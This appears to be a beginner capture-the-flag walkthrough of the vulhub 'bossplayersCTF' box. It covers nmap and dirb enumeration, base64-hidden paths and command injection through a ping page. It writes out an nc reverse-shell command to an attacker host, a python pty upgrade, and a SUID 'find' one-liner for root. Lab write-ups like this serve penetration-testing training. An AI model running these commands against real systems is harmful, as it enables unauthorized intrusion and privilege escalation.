bossplayersCTF ( For beginners)
This Box is from vulhub you can download it from Link.
For this box you have to have knowledge of simple html,encoding an decoding (base64),nc(for reverse shell),find permission for root (privilege escalation).
Breaching Process
Finding IP
- Nmap
- Browsing HTTP service
- Enumerating directory
- Found robots.txt
- Got base64
- Decoded and got direcory
- nc revserse shell
Privilege Escalation
- Gaining access to root using find
Let's Breach
Using nmap we scan the network ip in our network
nmap -sn ip_range (use root permission to scan )
After scanning, the IP of machine was
after finding the ip we go for Enumeration (this is the phase where you have to see every single piece of information)
I go for dirb scan and found robots.txt
Then i got for robots.txt without consuming time and got base64 encoded text decoded it but got trolled. Saying try harder
Then i go for more enumeration where i go for source page one by one and then found some random text at last page of source
The code was encoded in base64 thrice time and it was simple to decode so i decoded the text and found workinginprogress.php
Surfing the decoded directory
In this page we can use ping command so command execution from browse.
so i check can i execute other command link whoami,ifconfig if i can then i can ger reverse shell from nc
whoami command run fine then time to got reverse shell
for reverse shell i use
nc -e /bin/bash ip port
seems like it execute the bash shell and i got the low privilege shell of www-data
in my terminal
The shell seems not good so i imported tty shell of bash using python
python -c 'import pty;pty.spawn("/bin/bash")'
Now let's find the permission
find / -perm -u=s -type f 2>/dev/null
and seems like find command can be executed as root without any password
I google for find command to run as root if the root user gave the find command as root permission without password
find . -exec /bin/bash -p \; -quit
okay the cool thing was i got root permission and the challenge was done
The flag was encoded in,decoding it i got
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